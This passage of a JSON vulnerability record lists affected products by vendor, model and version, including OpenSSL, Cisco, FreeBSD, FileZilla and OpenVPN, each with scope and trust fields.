            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
